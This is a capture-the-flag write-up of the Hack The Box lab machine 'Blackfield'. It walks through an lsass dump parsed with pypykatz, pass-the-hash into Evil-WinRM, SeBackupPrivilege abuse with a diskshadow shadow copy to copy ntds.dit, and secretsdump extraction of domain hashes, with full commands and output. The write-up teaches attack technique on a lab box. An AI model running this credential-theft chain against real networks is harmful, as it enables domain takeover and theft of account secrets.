Enter new password for audit2020:
Enter WORKGROUP\support's password: 


Good. Again, let's retrace our steps and try an SMB connection with this new credential.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ smbclient -U audit2020 //10.10.10.192/forensic
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 14:03:16 2020
  ..                                  D        0  Sun Feb 23 14:03:16 2020
  commands_output                     D        0  Sun Feb 23 19:14:37 2020
  memory_analysis                     D        0  Thu May 28 22:28:33 2020
  tools                               D        0  Sun Feb 23 14:39:08 2020

                7846143 blocks of size 4096. 3667024 blocks available
smb: \> 


This time the forensic share is accessible, fine. After a quick look at the files inside these folders, I realise that it would be better to download all the content to my PC and work locally. I can leave the files inside the tools folder, though, so I start the download and stop it when the process reaches those files. In fact, in the tools folder:

smb: \> cd tools\
smb: \tools\> ls
  .                                   D        0  Sun Feb 23 14:39:08 2020
  ..                                  D        0  Sun Feb 23 14:39:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 14:39:03 2020
  sysinternals                        D        0  Sun Feb 23 14:35:25 2020
  volatility                          D        0  Sun Feb 23 14:35:39 2020

                7846143 blocks of size 4096. 4064625 blocks available
smb: \tools\> 


These tools are usually used to investigate a system and produce report files (like the ones found in the other folders); are they clues left there on purpose? Just to understand, I search for the first one on Google:

sleuthkit/sleuthkit
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.

The Sleuth Kit
The Sleuth Kit is a C library and collection of open source command line tools for the forensic analysis of NTFS, FAT, EXT2FS, and FFS file systems

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (2.8 KiloBytes/sec) (average 2.8 KiloBytes/sec)
[...]
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (52.7 KiloBytes/sec) (average 300.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1554.3 KiloBytes/sec) (average 1465.0 KiloBytes/sec)
[...]
getting file \memory_analysis\WmiPrvSE.zip of size 18303252 as WmiPrvSE.zip (997.3 KiloBytes/sec) (average 1285.9 KiloBytes/sec)


The first folder seems to hold a set of files exported from the machine's activity logs plus additional information about the system. I give it a quick look but feel fairly confident that nothing particularly interesting is here; anyway, I have these files on my machine and can come back later to understand them better.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/commands_output$ ls -la
total 576
drwxr-xr-x 2 in7rud3r in7rud3r   4096 Jun 20 09:59 .
drwxr-xr-x 4 in7rud3r in7rud3r   4096 Jun 20 10:10 ..
-rw-r--r-- 1 in7rud3r in7rud3r    528 Jun 20 09:59 domain_admins.txt
-rw-r--r-- 1 in7rud3r in7rud3r    962 Jun 20 09:59 domain_groups.txt
-rw-r--r-- 1 in7rud3r in7rud3r  16454 Jun 20 09:59 domain_users.txt
-rw-r--r-- 1 in7rud3r in7rud3r 518202 Jun 20 09:59 firewall_rules.txt
-rw-r--r-- 1 in7rud3r in7rud3r   1782 Jun 20 09:59 ipconfig.txt
-rw-r--r-- 1 in7rud3r in7rud3r   3842 Jun 20 09:59 netstat.txt
-rw-r--r-- 1 in7rud3r in7rud3r   3976 Jun 20 09:59 route.txt
-rw-r--r-- 1 in7rud3r in7rud3r   4550 Jun 20 09:59 systeminfo.txt
-rw-r--r-- 1 in7rud3r in7rud3r   9990 Jun 20 09:59 tasklist.txt


In the second folder, I found something more interesting:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf conhost.zip 
Archive contains:
  conhost.DMP
Total 1 entries (104500231 bytes)
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf ctfmon.zip 
Archive contains:
  ctfmon.DMP
Total 1 entries (69423930 bytes)


Dump files; could some specific dump turn out to be useful to me? I search the internet for "exploit DMP file from windows" and find:

Memory Dump Analysis – Extracting Juicy Data

Great, it seems I need the lsass dump, and I'm lucky enough that there is one:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ unzip lsass.zip 
Archive:  lsass.zip
  inflating: lsass.DMP   


Now, I spent hours trying to make mimikatz work on my machine, but... nothing. So I searched for an alternative online and found pypykatz:

skelsec/pypykatz
Mimikatz implementation in pure Python. Contribute to skelsec/pypykatz development by creating an account on GitHub.


And let me say, it works really well.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ pypykatz lsa -o dmp-lsass-analisys.txt minidump lsass.DMP 
INFO:root:Parsing file lsass.DMP

FILE: ======== lsass.DMP =======
[...]
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
	== MSV ==
		Username: Administrator
		Domain: BLACKFIELD
		LM: NA
		NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
		SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
	== SSP [25869]==
		username 
		domainname 
		password None
	== Kerberos ==
		Username: Administrator
		Domain: BLACKFIELD.LOCAL
		Password: None
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
	== DPAPI [25869]==
		luid 153705
		key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
		masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
		sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
		Password: None
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
	== DPAPI [633e3]==
		luid 406499
		key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
		masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
		sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991


The output is really long, so I extracted only the interesting parts: the NT hashes of the svc_backup user and of the Administrator. If you remember one of my past write-ups (which I hope is already published, depending on HTB's retirement order), Evil-WinRM accepts an NT hash in place of the password (pass-the-hash, via the -H option), so we can use it to get a shell on the remote machine without cracking anything. Obviously, I try the Administrator's hash first:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1


But it doesn't work: WinRMAuthorizationError means the credential was rejected, so this is probably an old dump and the password has since been changed (the notes.txt we will find on the Administrator's desktop says as much). Let's try the other user:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> 


And finally, we have a shell. Getting the user flag is simple now: check that it is readable by svc_backup, the user we are connected as, and take it from the Desktop folder:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> pwd

Path
----
C:\Users\svc_backup\Documents


*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> ls


    Directory: C:\Users\svc_backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/23/2020   9:16 AM                3D Objects
d-r---        2/23/2020   9:16 AM                Contacts
d-r---        2/28/2020   2:26 PM                Desktop
d-r---        6/19/2020   2:05 PM                Documents
d-r---        2/23/2020   9:16 AM                Downloads
d-r---        2/23/2020   9:16 AM                Favorites
d-r---        2/23/2020   9:16 AM                Links
d-r---        2/23/2020   9:16 AM                Music
d-----        6/19/2020   8:53 AM                ntds
d-r---        2/23/2020   9:16 AM                Pictures
d-r---        2/23/2020   9:16 AM                Saved Games
d-r---        2/23/2020   9:16 AM                Searches
d-r---        2/23/2020   9:16 AM                Videos


*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/19/2020   4:16 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
a******************************6
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> 


Well done, on to root. Try to read root.txt and you will get a bad surprise. Next to root.txt there is also notes.txt, which gives some extra information; I did not end up using it for the flag, but its last line is worth reading carefully, because it explains the error you are about to see.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-ar---        6/19/2020   4:16 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.

PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 


Another useful tool for enumerating and investigating from inside a Windows machine is winPEAS, available as an executable or as a batch file. Upload it with Evil-WinRM's upload command and launch it. As usual I report only the part that gave me something useful (the same list can be obtained natively with whoami /priv):

*Evil-WinRM* PS C:\temp\not-this> ./winPEAS.bat
            *((,.,/((((((((((((((((((((/,  */
     ,/*,..*(((((((((((((((((((((((((((((((((,
[...]
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]


So my current account holds these privileges. I concentrated on SeBackupPrivilege, SeRestorePrivilege and SeIncreaseWorkingSetPrivilege. I could not find anything interesting for the last two, but the first one gives me some hope: it lets a process open any file for reading with backup semantics, bypassing the DACL. Searching on Google for "SeBackupPrivilege exploit":

giuliano108/SeBackupPrivilege: use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn't have access to.

Also in this case I lost a lot of hours trying and retrying, because I could not reproduce the outcome described on the project page, until I finally found the right sequence of commands to run on the target. But first, upload the two library files to the remote machine:

*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeCmdLets.dll

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/SeBackupPrivilegeCmdLets.dll to C:\temp\not-this\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeUtils.dll  

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/SeBackupPrivilegeUtils.dll to C:\temp\not-this\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp\not-this> ls


    Directory: C:\temp\not-this


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/20/2020   4:20 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/20/2020   4:20 PM          16384 SeBackupPrivilegeUtils.dll
-a----        6/20/2020   2:54 PM          32976 winPEAS.bat


I list here two other useful links that helped me understand the right way to elevate privileges. The first comes from the winPEAS output about these specific privileges, which reports:

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_->[*] BASIC USER INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups

The second one extends the first; I reached it while investigating why, even when using the backup features available to my account, I still had no access to the file.

Hackplayers/PsCabesha-tools: PowerShell "crazy and sometimes diabolic" scripts.

The steps I'm going to describe did not accomplish the hack, but they helped me understand how to proceed, and I'd like to explain them to you. Look at this...

*Evil-WinRM* PS C:\temp\not-this> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> type c:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type c:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand


You can see that I still cannot read the file, even though I should now have the right access to it. I get the same confirmation when I try to back it up: again, access denied:

*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
Obviously, many of you, with more experience, will be thinking that I failed because that is not the correct way to use these commands... okay, I accept the criticism, I discovered it at my expense, but like many others who read my articles I am learning, and I want to remind you that I come from a developer background, not a sysadmin one.

The strangest thing, which I did not understand immediately, is shown by this sequence of instructions executed on the shell:

*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BLACKFIELD\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)



*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow  FullControl
         BLACKFIELD\svc_backup Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BLACKFIELD\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(A;;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)



*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege


As you can see, at first svc_backup has no ACE on the file; after the change the DACL lists BLACKFIELD\svc_backup with FullControl (Set-Acl succeeds, most likely thanks to SeRestorePrivilege), and yet every read still fails. The DACL was never the obstacle. Remember notes.txt: root.txt is encrypted, that is, protected with EFS, and opening an EFS file without a key that can decrypt it returns Access is denied whatever the permissions say, even with backup semantics. The same thing happened when I found this article about the ntds.dit file:

Technology Blogs & HTB Writeups
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit       
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
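Before spending hours on ACLs, a quick triage of the failure tells you which of three different obstacles you are facing: an EFS-encrypted file, a DACL that refuses you, or a file held open exclusively by another process. The following PowerShell is an added example, not code from the write-up or from the linked repositories; the function name Get-FileReadVerdict and its verdict strings are my own, and the two paths are the ones from this box.

```powershell
# Added example, not part of the original write-up. Triage why a file read
# fails from a low-privileged shell before reaching for ACL tricks or the
# SeBackupPrivilege cmdlets. Function name and verdict strings are mine.
function Get-FileReadVerdict {
    param([Parameter(Mandatory)][string]$Path)

    # Attributes need only list rights on the parent folder, so they are
    # often readable even when the file itself cannot be opened.
    $attrs = $null
    try {
        $attrs = (Get-Item -LiteralPath $Path -Force -ErrorAction Stop).Attributes
    } catch { }
    if ($attrs -and ($attrs -band [IO.FileAttributes]::Encrypted)) {
        # EFS: neither an extra ACE nor backup semantics yields plaintext
        # without a key that can decrypt the file (cipher.exe /c lists them).
        return 'encrypted'
    }

    try {
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open,
                              [IO.FileAccess]::Read, [IO.FileShare]::ReadWrite)
        $fs.Dispose()
        return 'readable'
    }
    catch [System.UnauthorizedAccessException] {
        # Plain DACL refusal: this is the case SeBackupPrivilege bypasses.
        return 'denied'
    }
    catch [System.IO.IOException] {
        # The low 16 bits of the HRESULT are the Win32 error code.
        $win32 = $_.Exception.HResult -band 0xFFFF
        if ($win32 -eq 32) {
            # ERROR_SHARING_VIOLATION: held open exclusively (LSASS on ntds.dit).
            # A VSS snapshot is the way around it, not more privileges.
            return 'locked'
        }
        throw
    }
}

foreach ($p in 'C:\Users\Administrator\Desktop\root.txt', 'C:\Windows\NTDS\ntds.dit') {
    $verdict = Get-FileReadVerdict -Path $p
    '{0,-45} {1}' -f $p, $verdict
    if ($verdict -eq 'encrypted') { cipher.exe /c $p }   # who can decrypt it
}
```

The order of the checks matters. Windows evaluates the DACL before the share mode, so a plain open of a file that is both restricted and locked reports denied, not locked; the sharing violation only surfaces once backup semantics get you past the DACL, and at that point only a snapshot helps. An encrypted verdict ends the story for any tool that does not hold a decrypting key.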


From now on, I start to concentrate on the ntds.dit file, searching on the internet for specific use-cases.

Poc’ing Beyond Domain Admin - Part 1 (on the privileges of built-in Active Directory groups)
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "set context persistent nowriters" | out-file ./cmd -encoding ascii
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "add volume c: alias temp" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "create" | out-file ./cmd -encoding ascii -append                        
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "expose %temp% z:" | out-file ./cmd -encoding ascii -append      
*Evil-WinRM* PS C:\temp\not-this\fhere> cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp\not-this\fhere> diskshadow.exe /s .\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/21/2020 1:30:12 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {40b73fa4-0ba8-4c2b-a24e-870c35369800} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}

        * Shadow copy ID = {40b73fa4-0ba8-4c2b-a24e-870c35369800}               %temp%
                - Shadow copy set: {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/21/2020 1:30:16 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {40b73fa4-0ba8-4c2b-a24e-870c35369800}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C:\temp\not-this\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C: ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege


After a couple of days on these attempts it seemed I was at a dead end, but this last one, despite its negative result, inspired me more than the others, so I decided to reset the machine and rerun the whole process, and finally... Note the one difference from the failed attempt: the source path is now z:\windows\ntds\ntds.dit, the snapshot, instead of c:\windows\ntds\ntds.dit, the live database that LSASS keeps open exclusively. The shadow copy is what makes the read possible.

*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit -Overwrite
*Evil-WinRM* PS C:\temp\not-this> ls  


    Directory: C:\temp\not-this


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2020   2:19 PM            617 2020-06-21_14-19-33_DC01.cab
-a----        6/21/2020   2:19 PM             86 cmd
-a----        6/21/2020   2:20 PM       18874368 ntds.dit
-a----        6/21/2020   2:15 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/21/2020   2:15 PM          16384 SeBackupPrivilegeUtils.dll


*Evil-WinRM* PS C:\temp\not-this> download ntds.dit /data/ntds.dit

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Downloading C:\temp\not-this\ntds.dit to /data/ntds.dit

Info: Download successful! 


Ok, let's go for the final part. Download ntds.dit and also export the SYSTEM registry hive: it contains the boot key needed to decrypt the password hashes stored in ntds.dit, as described in the tutorial linked before.

*Evil-WinRM* PS C:\temp\not-this> reg save hklm\system c:\temp\system.bak
The operation completed successfully.

*Evil-WinRM* PS C:\temp\not-this> cd ..
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/21/2020   2:20 PM                not-this
-a----        6/21/2020   2:26 PM       17387520 system.bak


*Evil-WinRM* PS C:\temp> download .\system.bak /data/system.bak

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Downloading C:\temp\.\system.bak to /data/system.bak

Info: Download successful!


Now impacket is our last tool once again: secretsdump.py in LOCAL mode reads the offline ntds.dit together with the SYSTEM hive:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
